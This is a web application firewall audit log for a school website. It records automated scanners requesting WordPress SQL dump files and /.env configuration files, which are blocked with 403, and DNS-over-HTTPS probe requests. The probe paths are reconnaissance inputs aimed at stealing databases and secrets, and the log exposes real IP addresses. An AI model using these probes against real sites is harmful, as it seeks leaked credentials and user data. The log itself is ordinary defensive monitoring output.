AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Mobile Safari/537.36 Accept: */* --d6f56344-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6f56344-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747179953929977 2839 (- - -) Stopwatch2: 1747179953929977 2839; combined=1046, p1=474, p2=536, p3=0, p4=0, p5=35, sr=108, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6f56344-Z-- --135f2648-A-- [14/May/2025:06:45:56 +0700] aCPZtF1ltXwOneQqchOzBAAAAAY 103.236.140.4 35446 103.236.140.4 8181 --135f2648-B-- GET /wordpress_.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.231.102.51 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.231.102.51 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Mobile Safari/537.36 Accept: */* --135f2648-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --135f2648-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747179956908880 2132 (- - -) Stopwatch2: 1747179956908880 2132; combined=738, p1=327, p2=374, p3=0, p4=0, p5=36, sr=58, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --135f2648-Z-- --b12b2b1c-A-- [14/May/2025:06:45:59 +0700] aCPZt8OlTOX2TmGW6__2xAAAAMo 103.236.140.4 35540 103.236.140.4 8181 --b12b2b1c-B-- GET /main_wordpress.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 176.65.149.88 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 176.65.149.88 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Mobile Safari/537.36 Accept: */* --b12b2b1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b12b2b1c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747179959209546 2479 (- - -) Stopwatch2: 1747179959209546 2479; combined=919, p1=423, p2=468, p3=0, p4=0, p5=28, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b12b2b1c-Z-- --247ee844-A-- [14/May/2025:06:46:00 +0700] aCPZuMOlTOX2TmGW6__20AAAANU 103.236.140.4 35604 103.236.140.4 8181 --247ee844-B-- GET /WP.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 176.65.149.88 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 176.65.149.88 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Mobile Safari/537.36 Accept: */* --247ee844-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --247ee844-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747179960763881 2104 (- - -) Stopwatch2: 1747179960763881 2104; combined=757, p1=366, p2=365, p3=0, p4=0, p5=25, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --247ee844-Z-- --a0eae474-A-- [14/May/2025:06:46:01 +0700] aCPZuTMGvM3GPb0-SyRVngAAAEw 103.236.140.4 35630 103.236.140.4 8181 --a0eae474-B-- GET /unnamed-file.wp.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.12 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Mobile Safari/537.36 Accept: */* --a0eae474-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0eae474-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".wp.sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747179961351661 2142 (- - -) Stopwatch2: 1747179961351661 2142; combined=805, p1=419, p2=360, p3=0, p4=0, p5=26, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0eae474-Z-- --0c8b114e-A-- [14/May/2025:06:46:01 +0700] aCPZuTMGvM3GPb0-SyRVogAAAEY 103.236.140.4 35660 103.236.140.4 8181 --0c8b114e-B-- GET /usr.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.12 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Mobile Safari/537.36 Accept: */* --0c8b114e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c8b114e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747179961989025 2058 (- - -) Stopwatch2: 1747179961989025 2058; combined=706, p1=373, p2=312, p3=0, p4=0, p5=21, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c8b114e-Z-- --389ef870-A-- [14/May/2025:06:46:02 +0700] aCPZusOlTOX2TmGW6__24gAAAMI 103.236.140.4 35696 103.236.140.4 8181 --389ef870-B-- GET /wp_users.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.12 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Mobile Safari/537.36 Accept: */* --389ef870-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --389ef870-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747179962846599 1953 (- - -) Stopwatch2: 1747179962846599 1953; combined=770, p1=371, p2=371, p3=0, p4=0, p5=28, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --389ef870-Z-- --89193356-A-- [14/May/2025:06:46:03 +0700] aCPZu8OlTOX2TmGW6__24wAAANI 103.236.140.4 35716 103.236.140.4 8181 --89193356-B-- GET /wp_user.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.12 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Mobile Safari/537.36 Accept: */* --89193356-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --89193356-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747179963335509 2155 (- - -) Stopwatch2: 1747179963335509 2155; combined=696, p1=339, p2=335, p3=0, p4=0, p5=22, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89193356-Z-- --82f69d19-A-- [14/May/2025:06:46:04 +0700] aCPZvDMGvM3GPb0-SyRVtAAAAEk 103.236.140.4 35758 103.236.140.4 8181 --82f69d19-B-- GET /wordpress1.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Mobile Safari/537.36 Accept: */* --82f69d19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82f69d19-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747179964382871 2061 (- - -) Stopwatch2: 1747179964382871 2061; combined=682, p1=326, p2=335, p3=0, p4=0, p5=21, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82f69d19-Z-- --4126c60d-A-- [14/May/2025:06:46:05 +0700] aCPZvcabX6K9rhby1vhScAAAAJQ 103.236.140.4 35808 103.236.140.4 8181 --4126c60d-B-- GET /blog.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Mobile Safari/537.36 Accept: */* --4126c60d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4126c60d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747179965531076 2147 (- - -) Stopwatch2: 1747179965531076 2147; combined=966, p1=452, p2=482, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4126c60d-Z-- --b1223360-A-- [14/May/2025:06:46:06 +0700] aCPZvl1ltXwOneQqchOzMAAAAAI 103.236.140.4 35842 103.236.140.4 8181 --b1223360-B-- GET /wp1.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Mobile Safari/537.36 Accept: */* --b1223360-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1223360-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747179966296407 2217 (- - -) Stopwatch2: 1747179966296407 2217; combined=720, p1=344, p2=345, p3=0, p4=0, p5=30, sr=62, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1223360-Z-- --8be4d80e-A-- [14/May/2025:07:22:21 +0700] aCPiPTMGvM3GPb0-SyR_DQAAAFc 103.236.140.4 36940 103.236.140.4 8181 --8be4d80e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.17 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.17 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --8be4d80e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8be4d80e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747182141391102 989 (- - -) Stopwatch2: 1747182141391102 989; combined=414, p1=368, p2=0, p3=0, p4=0, p5=46, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8be4d80e-Z-- --1b779d5f-A-- [14/May/2025:07:22:23 +0700] aCPiPzMGvM3GPb0-SyR_NgAAAEU 103.236.140.4 37050 103.236.140.4 8181 --1b779d5f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.17 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.17 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --1b779d5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b779d5f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747182143871655 798 (- - -) Stopwatch2: 1747182143871655 798; combined=325, p1=288, p2=0, p3=0, p4=0, p5=37, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b779d5f-Z-- --d189101c-A-- [14/May/2025:09:19:37 +0700] aCP9uTMGvM3GPb0-SyT9MQAAAEY 103.236.140.4 35704 103.236.140.4 8181 --d189101c-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --d189101c-C-- ð‡examplecom --d189101c-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --d189101c-H-- Message: Warning. 
Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747189177745962 6034 (- - -) Stopwatch2: 1747189177745962 6034; combined=4442, p1=819, p2=3455, p3=54, p4=80, p5=34, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d189101c-Z-- --0ab3300d-A-- [14/May/2025:09:19:38 +0700] aCP9usabX6K9rhby1vga_QAAAIo 103.236.140.4 35738 103.236.140.4 8181 --0ab3300d-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --0ab3300d-C-- Þexamplecom --0ab3300d-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ab3300d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747189178357620 4072 (- - -) Stopwatch2: 1747189178357620 4072; combined=2703, p1=877, p2=1732, p3=36, p4=31, p5=27, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ab3300d-Z-- --bca0f617-A-- [14/May/2025:09:19:39 +0700] aCP9u8abX6K9rhby1vgbAgAAAIU 103.236.140.4 35784 103.236.140.4 8181 --bca0f617-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --bca0f617-C-- -ôexamplecom --bca0f617-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --bca0f617-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747189179381805 3622 (- - -) Stopwatch2: 1747189179381805 3622; combined=2482, p1=564, p2=1832, p3=28, p4=32, p5=25, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bca0f617-Z-- --3dd6a669-A-- [14/May/2025:09:19:40 +0700] aCP9vDMGvM3GPb0-SyT9PgAAAE0 103.236.140.4 35830 103.236.140.4 8181 --3dd6a669-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --3dd6a669-C-- Xexamplecom --3dd6a669-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --3dd6a669-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747189180393737 3032 (- - -) Stopwatch2: 1747189180393737 3032; combined=2040, p1=424, p2=1543, p3=25, p4=28, p5=20, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3dd6a669-Z-- --3b025402-A-- [14/May/2025:09:19:40 +0700] aCP9vDMGvM3GPb0-SyT9QgAAAEo 103.236.140.4 35858 103.236.140.4 8181 --3b025402-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --3b025402-C-- Øïexamplecom --3b025402-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b025402-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747189180993729 3196 (- - -) Stopwatch2: 1747189180993729 3196; combined=2231, p1=453, p2=1702, p3=25, p4=30, p5=21, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b025402-Z-- --a40e4a45-A-- [14/May/2025:09:19:41 +0700] aCP9vV1ltXwOneQqchNOGQAAAAI 103.236.140.4 35886 103.236.140.4 8181 --a40e4a45-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --a40e4a45-C-- ˜Ìexamplecom --a40e4a45-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --a40e4a45-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s 